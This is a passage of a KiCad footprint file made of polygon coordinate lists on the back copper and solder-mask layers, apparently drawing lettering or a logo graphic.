6.221961 6.647087) (xy 6.255846 6.594286) (xy 6.265141 6.490451) (xy 6.265333 6.457894) (xy 6.265333 6.271067) (xy 5.721926 6.278784) (xy 5.466307 6.27978) (xy 5.283276 6.271225) (xy 5.160894 6.248403) (xy 5.08722 6.206601) (xy 5.050315 6.141106) (xy 5.038238 6.047204) (xy 5.037667 6.008648) (xy 5.045327 5.899552) (xy 5.0643 5.832978) (xy 5.069876 5.82709) (xy 5.122239 5.813827) (xy 5.240853 5.792499) (xy 5.408025 5.766067) (xy 5.602796 5.73794) (xy 5.849798 5.701103) (xy 6.026856 5.665937) (xy 6.148348 5.626486) (xy 6.228654 5.576798) (xy 6.28215 5.510916) (xy 6.315144 5.442948) (xy 6.352359 5.29156) (xy 6.366143 5.097592) (xy 6.357393 4.894788) (xy 6.327008 4.716888) (xy 6.293384 4.625316) (xy 6.224511 4.514498) (xy 6.14316 4.436263) (xy 6.033637 4.384797) (xy 5.880247 4.354289) (xy 5.667296 4.338927) (xy 5.508423 4.334633) (xy 5.290876 4.333493) (xy 5.084426 4.337219) (xy 4.915448 4.345074) (xy 4.826 4.353684) (xy 4.6355 4.3815) (xy 4.610032 4.775398) (xy 5.202223 4.768949) (xy 5.450065 4.769406) (xy 5.64609 4.776232) (xy 5.779338 4.788787) (xy 5.83858 4.806156) (xy 5.892953 4.907324) (xy 5.910227 5.03944) (xy 5.886405 5.157711) (xy 5.872115 5.181858) (xy 5.822684 5.223312) (xy 5.73358 5.257173) (xy 5.589942 5.287518) (xy 5.376913 5.318425) (xy 5.37207 5.319047) (xy 5.174688 5.347541) (xy 4.997364 5.378817) (xy 4.864338 5.408311) (xy 4.81342 5.424236) (xy 4.691354 5.510263) (xy 4.612211 5.654421) (xy 4.572855 5.864165) (xy 4.567033 6.009555) (xy 4.579776 6.239179) (xy 4.625528 6.41474) (xy 4.713121 6.542688) (xy 4.851387 6.629473) (xy 5.049157 6.681543) (xy 5.315263 6.705348) (xy 5.5245 6.70873) (xy 5.734944 6.705715)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy 8.077081 6.718202) (xy 8.341611 6.68423) (xy 8.541733 6.620735) (xy 8.68635 6.517507) (xy 8.784366 6.364335) (xy 8.844685 6.151011) (xy 8.876209 5.867324) (xy 8.880024 5.797443) (xy 8.90199 5.334) (xy 7.354989 5.334) (xy 7.376995 5.138758) (xy 7.397795 5.005046) (xy 7.433584 4.907269) (xy 7.496355 4.839928) (xy 7.598103 4.797522) (xy 7.750822 4.774553) (xy 7.966505 4.76552) (xy 8.192902 4.764634) (xy 8.805333 4.766768) (xy 8.805333 4.372395) (xy 8.545123 4.345197) (xy 8.307809 4.328353) (xy 8.048498 4.322889) (xy 7.794329 4.328282) (xy 7.572435 4.344007) (xy 7.421213 4.366904) (xy 7.212095 4.454827) (xy 7.049275 4.607389) (xy 6.946989 4.81087) (xy 6.941842 4.828959) (xy 6.917055 4.973858) (xy 6.90088 5.176525) (xy 6.893253 5.41308) (xy 6.894113 5.659644) (xy 6.896321 5.715) (xy 7.354492 5.715) (xy 8.424333 5.715) (xy 8.424333 5.861175) (xy 8.395729 6.055999) (xy 8.308369 6.193391) (xy 8.159936 6.27495) (xy 7.94811 6.302278) (xy 7.797328 6.294122) (xy 7.608407 6.257235) (xy 7.485674 6.184033) (xy 7.413601 6.060361) (xy 7.381968 5.915463) (xy 7.354492 5.715) (xy 6.896321 5.715) (xy 6.903398 5.892339) (xy 6.921046 6.087285) (xy 6.945441 6.215566) (xy 7.047561 6.417664) (xy 7.216344 6.57005) (xy 7.449051 6.671508) (xy 7.742942 6.720821) (xy 8.077081 6.718202)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy 1.262071 6.12775) (xy 1.257809 5.702375) (xy 1.251865 5.353789) (xy 1.240943 5.074131) (xy 1.221741 4.855537) (xy 1.190962 4.690146) (xy 1.145306 4.570095) (xy 1.081473 4.487523) (xy 0.996166 4.434568) (xy 0.886083 4.403366) (xy 0.747928 4.386058) (xy 0.578399 4.374779) (xy 0.525164 4.371649) (xy 0.127 4.347894) (xy 0.127 4.773911) (xy 0.355099 4.80241) (xy 0.460884 4.814749) (xy 0.545358 4.828348) (xy 0.611003 4.852034) (xy 0.660297 4.894634) (xy 0.695721 4.964975) (xy 0.719753 5.071884) (xy 0.734874 5.224188) (xy 0.743563 5.430714) (xy 0.7483 5.700289) (xy 0.751564 6.04174) (xy 0.753198 6.219542) (xy 0.765562 7.493) (xy 1.27531 7.493) (xy 1.262071 6.12775)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy 10.837333 7.376484) (xy 10.607066 7.357389) (xy 10.43141 7.333735) (xy 10.323277 7.286792) (xy 10.266867 7.199174) (xy 10.24638 7.053496) (xy 10.244667 6.95865) (xy 10.244667 6.688667) (xy 10.837333 6.688667) (xy 10.837333 6.265333) (xy 10.244667 6.265333) (xy 10.244667 4.360333) (xy 9.736667 4.360333) (xy 9.736667 6.265333) (xy 9.271 6.265333) (xy 9.271 6.688667) (xy 9.724117 6.688667) (xy 9.749779 7.021435) (xy 9.779253 7.279306) (xy 9.829959 7.465359) (xy 9.914237 7.591972) (xy 10.044431 7.671527) (xy 10.232882 7.716402) (xy 10.463586 7.737434) (xy 10.837333 7.758744) (xy 10.837333 7.376484)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -4.327098 7.617196) (xy -4.304882 7.601208) (xy -4.289991 7.560676) (xy -4.28135 7.484236) (xy -4.277882 7.360529) (xy -4.278511 7.178191) (xy -4.282161 6.925861) (xy -4.283632 6.837905) (xy -4.288767 6.561711) (xy -4.29456 6.357336) (xy -4.302612 6.211938) (xy -4.314526 6.112674) (xy -4.331904 6.046701) (xy -4.356347 6.001178) (xy -4.389458 5.963262) (xy -4.393213 5.959489) (xy -4.452875 5.911116) (xy -4.52841 5.880261) (xy -4.641226 5.861837) (xy -4.812733 5.850758) (xy -4.85888 5.848863) (xy -5.028567 5.845865) (xy -5.16512 5.850122) (xy -5.247142 5.860691) (xy -5.259917 5.866502) (xy -5.289931 5.934777) (xy -5.291667 5.954889) (xy -5.267388 5.98589) (xy -5.186497 6.003862) (xy -5.036913 6.010986) (xy -4.978857 6.011333) (xy -4.767282 6.02227) (xy -4.623583 6.060994) (xy -4.533109 6.13638) (xy -4.481208 6.257302) (xy -4.467901 6.320796) (xy -4.440209 6.482092) (xy -4.544662 6.413651) (xy -4.675079 6.364444) (xy -4.846276 6.34494) (xy -5.021062 6.355402) (xy -5.162245 6.396093) (xy -5.18507 6.409107) (xy -5.2599 6.485084) (xy -5.307381 6.604014) (xy -5.330016 6.778009) (xy -5.330235 6.955586) (xy -5.136445 6.955586) (xy -5.132747 6.782535) (xy -5.118845 6.67365) (xy -5.090526 6.608641) (xy -5.057798 6.576841) (xy -4.933138 6.529086) (xy -4.77721 6.524335) (xy -4.630675 6.560931) (xy -4.570465 6.596731) (xy -4.519394 6.649054) (xy -4.490392 6.71793) (xy -4.477538 6.826884) (xy -4.474883 6.976476) (xy -4.481752 7.172399) (xy -4.509817 7.298891) (xy -4.570264 7.370593) (xy -4.674279 7.402145) (xy -4.804833 7.408333) (xy -4.952305 7.399875) (xy -5.048654 7.364899) (xy -5.104428 7.289004) (xy -5.130175 7.157787) (xy -5.136444 6.956847) (xy -5.136445 6.955586) (xy -5.330235 6.955586) (xy -5.330314 7.019182) (xy -5.327008 7.095051) (xy -5.315639 7.263806) (xy -5.297141 7.372327) (xy -5.263565 7.445042) (xy -5.206962 7.506379) (xy -5.187652 7.523341) (xy -5.100118 7.586679) (xy -5.009952 7.613797) (xy -4.881261 7.613706) (xy -4.840111 7.610591) (xy -4.671326 7.58122) (xy -4.549346 7.529504) (xy -4.530323 7.514761) (xy -4.468669 7.463727) (xy -4.447385 7.474053) (xy -4.445 7.528772) (xy -4.418843 7.603356) (xy -4.357716 7.62) (xy -4.327098 7.617196)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -8.974667 7.260167) (xy -8.97496 6.960585) (xy -8.976493 6.735145) (xy -8.980244 6.57332) (xy -8.987193 6.464586) (xy -8.998319 6.398417) (xy -9.014601 6.364288) (xy -9.037017 6.351674) (xy -9.059333 6.35) (xy -9.1287 6.378316) (xy -9.145287 6.44525) (xy -9.150889 6.508789) (xy -9.172897 6.4941) (xy -9.188792 6.468083) (xy -9.255541 6.409676) (xy -9.365717 6.358873) (xy -9.388588 6.351903) (xy -9.524735 6.320656) (xy -9.638134 6.317538) (xy -9.767573 6.337432) (xy -9.884465 6.386075) (xy -9.964818 6.485499) (xy -10.012683 6.645057) (xy -10.032107 6.874097) (xy -10.033 6.950478) (xy -10.032429 6.963833) (xy -9.8425 6.963833) (xy -9.833018 6.762219) (xy -9.805583 6.628858) (xy -9.7844 6.58934) (xy -9.697069 6.539685) (xy -9.564376 6.519066) (xy -9.420486 6.527479) (xy -9.299569 6.564921) (xy -9.26375 6.589395) (xy -9.221002 6.646978) (xy -9.196932 6.736972) (xy -9.187196 6.880588) (xy -9.186333 6.967371) (xy -9.19452 7.166502) (xy -9.226246 7.296027) (xy -9.292263 7.370034) (xy -9.403324 7.402612) (xy -9.52284 7.408333) (xy -9.666764 7.397703) (xy -9.760534 7.356424) (xy -9.814281 7.270409) (xy -9.838133 7.125575) (xy -9.8425 6.963833) (xy -10.032429 6.963833) (xy -10.021814 7.21202) (xy -9.986386 7.399823) (xy -9.92391 7.52206) (xy -9.831582 7.5869) (xy -9.812446 7.592875) (xy -9.621958 7.618115) (xy -9.430521 7.601519) (xy -9.30275 7.55875) (xy -9.186333 7.498021) (xy -9.186333 7.834177) (xy -9.185185 8.001385) (xy -9.178101 8.101265) (xy -9.159621 8.151157) (xy -9.124289 8.168398) (xy -9.0805 8.170333) (xy -8.974667 8.170333) (xy -8.974667 7.260167)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -7.891808 7.610548) (xy -7.721183 7.5632) (xy -7.610033 7.463198) (xy -7.550719 7.304093) (xy -7.535333 7.110008) (xy -7.535333 6.900333) (xy -8.382 6.900333) (xy -8.382 6.776357) (xy -8.366714 6.66127) (xy -8.312487 6.585046) (xy -8.206769 6.540803) (xy -8.037008 6.521659) (xy -7.91331 6.519333) (xy -7.744856 6.517295) (xy -7.644136 6.508533) (xy -7.594262 6.489076) (xy -7.578346 6.454955) (xy -7.577667 6.440421) (xy -7.616309 6.381709) (xy -7.720003 6.33988) (xy -7.870399 6.317227) (xy -8.049151 6.316043) (xy -8.237908 6.338621) (xy -8.295265 6.350728) (xy -8.409959 6.394216) (xy -8.49103 6.453363) (xy -8.494612 6.457944) (xy -8.546074 6.577611) (xy -8.578843 6.757646) (xy -8.590117 6.975256) (xy -8.581452 7.164723) (xy -8.577089 7.191483) (xy -8.382 7.191483) (xy -8.382 7.069667) (xy -7.69794 7.069667) (xy -7.72693 7.20725) (xy -7.763812 7.33088) (xy -7.823365 7.398269) (xy -7.928275 7.425577) (xy -8.038944 7.4295) (xy -8.219868 7.409379) (xy -8.331363 7.346346) (xy -8.379196 7.236402) (xy -8.382 7.191483) (xy -8.577089 7.191483) (xy -8.549291 7.361937) (xy -8.485559 7.491069) (xy -8.375116 7.567093) (xy -8.202822 7.604985) (xy -8.129546 7.611692) (xy -7.891808 7.610548)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -6.446255 7.597278) (xy -6.36716 7.548664) (xy -6.35 7.492843) (xy -6.357552 7.447009) (xy -6.393315 7.425761) (xy -6.47695 7.424527) (xy -6.596901 7.435438) (xy -6.802587 7.44198) (xy -6.938404 7.408938) (xy -7.010782 7.333428) (xy -7.027333 7.242448) (xy -7.006866 7.151803) (xy -6.936772 7.097807) (xy -6.804017 7.073484) (xy -6.705567 7.070245) (xy -6.565635 7.054864) (xy -6.443641 7.024119) (xy -6.329837 6.94383) (xy -6.27479 6.804334) (xy -6.279436 6.608271) (xy -6.284931 6.576311) (xy -6.339953 6.449459) (xy -6.452556 6.365573) (xy -6.627826 6.32309) (xy -6.870847 6.320446) (xy -7.059083 6.338291) (xy -7.160804 6.36636) (xy -7.196089 6.423465) (xy -7.196667 6.435637) (xy -7.187841 6.475642) (xy -7.150337 6.500998) (xy -7.067619 6.516088) (xy -6.923149 6.525295) (xy -6.847417 6.528205) (xy -6.498167 6.5405) (xy -6.498167 6.836833) (xy -6.812674 6.888874) (xy -6.970952 6.919843) (xy -7.097832 6.953449) (xy -7.168684 6.983027) (xy -7.172507 6.986241) (xy -7.199104 7.052686) (xy -7.21541 7.17021) (xy -7.217833 7.239605) (xy -7.202991 7.404098) (xy -7.149321 7.511677) (xy -7.04311 7.575117) (xy -6.870641 7.607194) (xy -6.818492 7.611599) (xy -6.594805 7.617776) (xy -6.446255 7.597278)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -1.610155 7.589596) (xy -1.527279 7.558196) (xy -1.438985 7.49323) (xy -1.385755 7.397484) (xy -1.360361 7.25177) (xy -1.355245 7.101417) (xy -1.354667 6.900333) (xy -2.201333 6.900333) (xy -2.201333 6.776357) (xy -2.186047 6.66127) (xy -2.13182 6.585046) (xy -2.026102 6.540803) (xy -1.856341 6.521659) (xy -1.732643 6.519333) (xy -1.564189 6.517295) (xy -1.46347 6.508533) (xy -1.413596 6.489076) (xy -1.39768 6.454955) (xy -1.397 6.440421) (xy -1.436047 6.381458) (xy -1.542701 6.33982) (xy -1.701234 6.317878) (xy -1.895919 6.318005) (xy -2.079707 6.337486) (xy -2.219927 6.390738) (xy -2.317957 6.504884) (xy -2.378103 6.68673) (xy -2.398694 6.841671) (xy -2.404624 7.123207) (xy -2.397178 7.167409) (xy -2.201333 7.167409) (xy -2.196768 7.119192) (xy -2.171669 7.090173) (xy -2.108928 7.075489) (xy -1.991441 7.07028) (xy -1.857375 7.069667) (xy -1.513417 7.069667) (xy -1.540669 7.205927) (xy -1.576759 7.327661) (xy -1.637877 7.395732) (xy -1.745342 7.424692) (xy -1.868196 7.4295) (xy -2.043961 7.407195) (xy -2.152322 7.337437) (xy -2.198697 7.215965) (xy -2.201333 7.167409) (xy -2.397178 7.167409) (xy -2.369014 7.334572) (xy -2.290537 7.480103) (xy -2.179033 7.559702) (xy -1.998422 7.606721) (xy -1.796046 7.616656) (xy -1.610155 7.589596)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy 0.084667 6.35) (xy -0.021167 6.35) (xy -0.107998 6.373433) (xy -0.127 6.420061) (xy -0.133095 6.466549) (xy -0.16581 6.453693) (xy -0.204177 6.420278) (xy -0.32181 6.358933) (xy -0.484004 6.3282) (xy -0.655195 6.331346) (xy -0.789155 6.366558) (xy -0.898902 6.446944) (xy -0.970315 6.576857) (xy -1.006236 6.765656) (xy -1.009061 6.987608) (xy -0.806712 6.987608) (xy -0.798102 6.823151) (xy -0.777238 6.683014) (xy -0.744671 6.594133) (xy -0.73781 6.585857) (xy -0.643174 6.539181) (xy -0.504888 6.520899) (xy -0.359231 6.53147) (xy -0.242477 6.571354) (xy -0.230341 6.579421) (xy -0.186629 6.6253) (xy -0.161467 6.697238) (xy -0.150234 6.816302) (xy -0.148167 6.953915) (xy -0.155081 7.156075) (xy -0.182809 7.288398) (xy -0.241827 7.36508) (xy -0.342613 7.400316) (xy -0.48355 7.408333) (xy -0.618806 7.399044) (xy -0.721773 7.375331) (xy -0.753533 7.357533) (xy -0.784976 7.281735) (xy -0.802519 7.149447) (xy -0.806712 6.987608) (xy -1.009061 6.987608) (xy -1.009508 7.022702) (xy -1.006541 7.082326) (xy -0.993645 7.257104) (xy -0.974952 7.370236) (xy -0.943409 7.444733) (xy -0.891969 7.503607) (xy -0.872063 7.521267) (xy -0.724507 7.598398) (xy -0.54381 7.623708) (xy -0.364243 7.596603) (xy -0.238543 7.532261) (xy -0.127 7.444522) (xy -0.127 7.807428) (xy -0.126049 7.982573) (xy -0.119949 8.089744) (xy -0.103833 8.145633) (xy -0.072834 8.166932) (xy -0.022083 8.170333) (xy 0.084667 8.170333) (xy 0.084667 6.35)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -5.787963 7.594295) (xy -5.764526 7.572234) (xy -5.748567 7.519985) (xy -5.738132 7.424882) (xy -5.731264 7.274259) (xy -5.72601 7.05545) (xy -5.724452 6.974417) (xy -5.712737 6.35) (xy -5.92893 6.35) (xy -5.917215 6.974417) (xy -5.912063 7.216208) (xy -5.905886 7.386004) (xy -5.896729 7.49647) (xy -5.882637 7.560274) (xy -5.861654 7.59008) (xy -5.831826 7.598557) (xy -5.820833 7.598833) (xy -5.787963 7.594295)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -3.678738 7.584405) (xy -3.65249 7.533641) (xy -3.630443 7.47495) (xy -3.594165 7.481936) (xy -3.549964 7.519629) (xy -3.455357 7.568254) (xy -3.309217 7.602948) (xy -3.240908 7.610976) (xy -3.100042 7.617347) (xy -3.009855 7.60125) (xy -2.937477 7.553941) (xy -2.902897 7.521079) (xy -2.857694 7.472093) (xy -2.827119 7.420885) (xy -2.808317 7.350678) (xy -2.798434 7.244694) (xy -2.794614 7.086155) (xy -2.794 6.881091) (xy -2.794766 6.661022) (xy -2.798524 6.511885) (xy -2.807461 6.419953) (xy -2.823767 6.371495) (xy -2.849631 6.352781) (xy -2.878667 6.35) (xy -2.917681 6.356131) (xy -2.942738 6.384857) (xy -2.957175 6.451674) (xy -2.964331 6.572081) (xy -2.967541 6.761575) (xy -2.967553 6.76275) (xy -2.971394 7.004175) (xy -2.981423 7.173657) (xy -3.004037 7.283918) (xy -3.045633 7.347683) (xy -3.112606 7.377673) (xy -3.211355 7.386613) (xy -3.281492 7.387167) (xy -3.425409 7.38336) (xy -3.509558 7.366197) (xy -3.558703 7.327069) (xy -3.585876 7.281333) (xy -3.612593 7.182784) (xy -3.631207 7.018862) (xy -3.639726 6.808641) (xy -3.640043 6.76275) (xy -3.641554 6.572925) (xy -3.647529 6.452247) (xy -3.661173 6.385207) (xy -3.685691 6.356296) (xy -3.724289 6.350002) (xy -3.725333 6.35) (xy -3.757873 6.354161) (xy -3.780802 6.37503) (xy -3.795795 6.425183) (xy -3.804531 6.517198) (xy -3.808686 6.663652) (xy -3.809937 6.877123) (xy -3.81 6.985) (xy -3.809001 7.231839) (xy -3.805145 7.406122) (xy -3.797148 7.519948) (xy -3.783724 7.585413) (xy -3.763589 7.614615) (xy -3.742537 7.62) (xy -3.678738 7.584405)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -5.740273 8.152849) (xy -5.715447 8.084004) (xy -5.715 8.0645) (xy -5.732485 7.983939) (xy -5.80133 7.959114) (xy -5.820833 7.958667) (xy -5.901394 7.976152) (xy -5.92622 8.044997) (xy -5.926667 8.0645) (xy -5.909182 8.145061) (xy -5.840337 8.169887) (xy -5.820833 8.170333) (xy -5.740273 8.152849)) (layer B.Cu) (width 0.01)) (fp_poly (pts (xy -3.894667 -0.254) (xy -4.148667 -0.254) (xy -4.289519 -0.251646) (xy -4.365574 -0.239252) (xy -4.396675 -0.208819) (xy -4.402667 -0.152351) (xy -4.402667 -0.151629) (xy -4.412346 -0.01925) (xy -4.445091 0.033022) (xy -4.506463 0.007918) (xy -4.579028 -0.065036) (xy -4.697845 -0.171585) (xy -4.843985 -0.241998) (xy -5.034919 -0.28162) (xy -5.28812 -0.2958) (xy -5.334 -0.296064) (xy -5.548329 -0.286916) (xy -5.71094 -0.255445) (xy -5.830165 -0.207829) (xy -5.953229 -0.130289) (xy -6.04635 -0.023786) (xy -6.122542 0.11303) (xy -6.171966 0.223116) (xy -6.20619 0.3294) (xy -6.228973 0.453258) (xy -6.244073 0.616065) (xy -6.255247 0.839197) (xy -6.256699 0.876126) (xy -6.260421 1.235619) (xy -5.709415 1.235619) (xy -5.708569 0.950042) (xy -5.699408 0.808236) (xy -5.663857 0.566138) (xy -5.601251 0.396704) (xy -5.507035 0.290977) (xy -5.414851 0.248644) (xy -5.238415 0.220779) (xy -5.036538 0.220124) (xy -4.850424 0.245224) (xy -4.764433 0.271631) (xy -4.650204 0.330643) (xy -4.568726 0.406542) (xy -4.514802 0.513498) (xy -4.483237 0.665687) (xy -4.468834 0.877282) (xy -4.466167 1.085117) (xy -4.47147 1.35127) (xy -4.491296 1.54713) (xy -4.531517 1.686629) (xy -4.598004 1.783697) (xy -4.696631 1.852267) (xy -4.808877 1.898124) (xy -4.991641 1.935869) (xy -5.189207 1.937417) (xy -5.374505 1.90619) (xy -5.52047 1.845612) (xy -5.573857 1.801389) (xy -5.640213 1.675899) (xy -5.686015 1.48244) (xy -5.709415 1.235619) (xy -6.260421 1.235619) (xy -6.260842 1.27621) (xy -6.237875 1.60428) (xy -6.185448 1.869285) (xy -6.10121 2.080177) (xy -5.982812 2.245906) (xy -5.870892 2.345424) (xy -5.781183 2.395404) (xy -5.661233 2.426903) (xy -5.48803 2.445101) (xy -5.409379 2.449341) (xy -5.116451 2.446835) (xy -4.885693 2.406685) (xy -4.70154 2.324788) (xy -4.582583 2.231542) (xy -4.445 2.100058) (xy -4.445 3.683) (xy -3.894667 3.683) (xy -3.894667 -0.254)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy -1.804068 2.444768) (xy -1.525568 2.413853) (xy -1.311485 2.355738) (xy -1.152703 2.266009) (xy -1.040106 2.140253) (xy -0.964578 1.974057) (xy -0.935106 1.861819) (xy -0.921392 1.755269) (xy -0.909329 1.579732) (xy -0.899536 1.350881) (xy -0.892634 1.084389) (xy -0.889243 0.795928) (xy -0.889 0.696416) (xy -0.889 -0.254) (xy -1.389558 -0.254) (xy -1.417775 -0.086985) (xy -1.445992 0.080029) (xy -1.56763 -0.058509) (xy -1.687464 -0.161057) (xy -1.82805 -0.237414) (xy -1.854962 -0.24669) (xy -2.040079 -0.282284) (xy -2.263115 -0.296136) (xy -2.493888 -0.289155) (xy -2.702214 -0.262248) (xy -2.8575 -0.216516) (xy -3.006995 -0.125069) (xy -3.107969 -0.003013) (xy -3.167224 0.164337) (xy -3.19156 0.391668) (xy -3.192244 0.446663) (xy -2.656914 0.446663) (xy -2.64777 0.389818) (xy -2.608235 0.291369) (xy -2.532325 0.226827) (xy -2.40701 0.191469) (xy -2.219259 0.180573) (xy -2.078466 0.183531) (xy -1.90174 0.192307) (xy -1.786777 0.206746) (xy -1.710681 0.233768) (xy -1.65056 0.280291) (xy -1.607872 0.325754) (xy -1.53651 0.436799) (xy -1.482141 0.57771) (xy -1.451121 0.721176) (xy -1.449804 0.839886) (xy -1.474529 0.898796) (xy -1.537378 0.918266) (xy -1.663177 0.928608) (xy -1.830808 0.930722) (xy -2.019149 0.925505) (xy -2.207081 0.913856) (xy -2.373485 0.896673) (xy -2.497239 0.874854) (xy -2.55366 0.852897) (xy -2.617749 0.754772) (xy -2.654445 0.608149) (xy -2.656914 0.446663) (xy -3.192244 0.446663) (xy -3.193008 0.508) (xy -3.178631 0.766753) (xy -3.135729 0.958346) (xy -3.058546 1.097166) (xy -2.941323 1.1976) (xy -2.9097 1.215913) (xy -2.838551 1.245955) (xy -2.742547 1.268183) (xy -2.607464 1.284164) (xy -2.419082 1.295469) (xy -2.163177 1.303666) (xy -2.101135 1.305104) (xy -1.429436 1.319949) (xy -1.457981 1.535131) (xy -1.491829 1.720855) (xy -1.539701 1.839735) (xy -1.610643 1.909447) (xy -1.661539 1.932802) (xy -1.736121 1.944073) (xy -1.877883 1.952721) (xy -2.06936 1.958132) (xy -2.293091 1.959693) (xy -2.404557 1.95892) (xy -3.05228 1.951503) (xy -3.039557 2.171131) (xy -3.026833 2.39076) (xy -2.8575 2.420607) (xy -2.748727 2.43247) (xy -2.578815 2.442532) (xy -2.371288 2.44971) (xy -2.1561 2.452894) (xy -1.804068 2.444768)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy 5.868926 2.452334) (xy 6.069704 2.442273) (xy 6.19125 2.428162) (xy 6.35 2.401922) (xy 6.35 1.919013) (xy 6.085417 1.956548) (xy 5.884266 1.97302) (xy 5.672303 1.970807) (xy 5.477091 1.951867) (xy 5.326193 1.918157) (xy 5.281521 1.899462) (xy 5.201015 1.836094) (xy 5.143659 1.737314) (xy 5.106405 1.591045) (xy 5.086203 1.385207) (xy 5.080002 1.107724) (xy 5.08 1.101409) (xy 5.086429 0.81064) (xy 5.107711 0.592033) (xy 5.146834 0.433917) (xy 5.206789 0.324624) (xy 5.290564 0.252484) (xy 5.298666 0.24781) (xy 5.391147 0.219928) (xy 5.551801 0.203805) (xy 5.787291 0.198908) (xy 5.897053 0.199868) (xy 6.396605 0.207266) (xy 6.383886 -0.01255) (xy 6.372585 -0.142435) (xy 6.349004 -0.211887) (xy 6.29943 -0.245126) (xy 6.244167 -0.259341) (xy 6.099603 -0.278346) (xy 5.904167 -0.288468) (xy 5.681642 -0.290223) (xy 5.455813 -0.284124) (xy 5.250466 -0.270688) (xy 5.089385 -0.250429) (xy 5.0165 -0.232748) (xy 4.814228 -0.118105) (xy 4.657171 0.059844) (xy 4.565609 0.262926) (xy 4.541794 0.395527) (xy 4.525089 0.590956) (xy 4.515466 0.827675) (xy 4.512898 1.084144) (xy 4.51736 1.338827) (xy 4.528823 1.570185) (xy 4.547262 1.75668) (xy 4.567599 1.861132) (xy 4.659716 2.05509) (xy 4.8065 2.229372) (xy 4.984021 2.35949) (xy 5.102121 2.408116) (xy 5.234543 2.430849) (xy 5.424429 2.446127) (xy 5.644862 2.453454) (xy 5.868926 2.452334)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy -7.374836 1.59552) (xy -7.241919 1.225076) (xy -7.118262 0.879146) (xy -7.006739 0.565864) (xy -6.910224 0.293364) (xy -6.83159 0.069779) (xy -6.773711 -0.096757) (xy -6.739462 -0.19811) (xy -6.731 -0.226668) (xy -6.769727 -0.240218) (xy -6.871824 -0.247076) (xy -7.016168 -0.245946) (xy -7.033889 -0.245271) (xy -7.336778 -0.232833) (xy -7.631536 0.592667) (xy -8.409982 0.592667) (xy -8.684167 0.59237) (xy -8.885588 0.590548) (xy -9.02615 0.585806) (xy -9.117757 0.576748) (xy -9.172312 0.561978) (xy -9.20172 0.540101) (xy -9.217883 0.509722) (xy -9.222402 0.497417) (xy -9.252477 0.413238) (xy -9.301606 0.27587) (xy -9.360304 0.111834) (xy -9.373816 0.074083) (xy -9.491257 -0.254) (xy -9.786399 -0.254) (xy -9.948067 -0.249899) (xy -10.037941 -0.23593) (xy -10.068569 -0.209591) (xy -10.067854 -0.197921) (xy -10.051084 -0.147472) (xy -10.008616 -0.025714) (xy -9.94342 0.158997) (xy -9.858467 0.398304) (xy -9.756728 0.683853) (xy -9.641173 1.007286) (xy -9.592573 1.143) (xy -9.014905 1.143) (xy -7.825961 1.143) (xy -7.855597 1.23825) (xy -7.915503 1.422152) (xy -7.988477 1.632915) (xy -8.069303 1.856971) (xy -8.152766 2.080752) (xy -8.23365 2.290691) (xy -8.306739 2.47322) (xy -8.366817 2.61477) (xy -8.408669 2.701774) (xy -8.42619 2.722544) (xy -8.450669 2.672803) (xy -8.49755 2.557255) (xy -8.561392 2.39005) (xy -8.636752 2.185339) (xy -8.691775 2.032) (xy -8.773643 1.802138) (xy -8.848723 1.592477) (xy -8.911081 1.419498) (xy -8.954788 1.299678) (xy -8.969877 1.259417) (xy -9.014905 1.143) (xy -9.592573 1.143) (xy -9.514774 1.360248) (xy -9.420715 1.622413) (xy -8.787264 3.386667) (xy -8.018672 3.386667) (xy -7.374836 1.59552)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy 1.565547 2.43917) (xy 1.762773 2.386633) (xy 1.914199 2.291656) (xy 1.996779 2.203221) (xy 2.1027 2.067879) (xy 2.176483 2.180487) (xy 2.313518 2.313797) (xy 2.518711 2.404163) (xy 2.785981 2.449348) (xy 2.921 2.454338) (xy 3.170494 2.441128) (xy 3.355883 2.394439) (xy 3.49388 2.306021) (xy 3.601197 2.167629) (xy 3.637022 2.101006) (xy 3.668499 2.034079) (xy 3.69304 1.968013) (xy 3.71176 1.891127) (xy 3.725772 1.791742) (xy 3.736192 1.658177) (xy 3.744133 1.478753) (xy 3.750711 1.241791) (xy 3.757038 0.935609) (xy 3.759205 0.820423) (xy 3.7792 -0.254) (xy 3.179277 -0.254) (xy 3.166555 0.760568) (xy 3.161622 1.08988) (xy 3.155629 1.344453) (xy 3.147864 1.534211) (xy 3.137617 1.669082) (xy 3.124179 1.758992) (xy 3.106838 1.813866) (xy 3.089324 1.839565) (xy 2.986734 1.895389) (xy 2.83137 1.928154) (xy 2.65277 1.93463) (xy 2.480474 1.911582) (xy 2.465761 1.907808) (xy 2.369785 1.877148) (xy 2.294666 1.836257) (xy 2.237635 1.775071) (xy 2.195921 1.683524) (xy 2.166752 1.551552) (xy 2.147359 1.369088) (xy 2.134971 1.126067) (xy 2.126818 0.812425) (xy 2.124153 0.66675) (xy 2.108375 -0.254) (xy 1.566333 -0.254) (xy 1.566097 0.645583) (xy 1.564462 0.997566) (xy 1.558643 1.274577) (xy 1.546955 1.486277) (xy 1.527719 1.642324) (xy 1.499251 1.752376) (xy 1.459868 1.826094) (xy 1.40789 1.873135) (xy 1.347413 1.901185) (xy 1.13172 1.945119) (xy 0.92616 1.930995) (xy 0.748677 1.864538) (xy 0.617216 1.751474) (xy 0.563306 1.651) (xy 0.543346 1.544863) (xy 0.527827 1.359635) (xy 0.517032 1.100792) (xy 0.511242 0.773806) (xy 0.510389 0.624417) (xy 0.508 -0.254) (xy -0.042333 -0.254) (xy -0.042333 2.413) (xy 0.465667 2.413) (xy 0.465667 2.243667) (xy 0.476447 2.122091) (xy 0.506281 2.078963) (xy 0.551409 2.116498) (xy 0.582499 2.174758) (xy 0.677679 2.288279) (xy 0.839935 2.376876) (xy 1.053823 2.434557) (xy 1.303898 2.455332) (xy 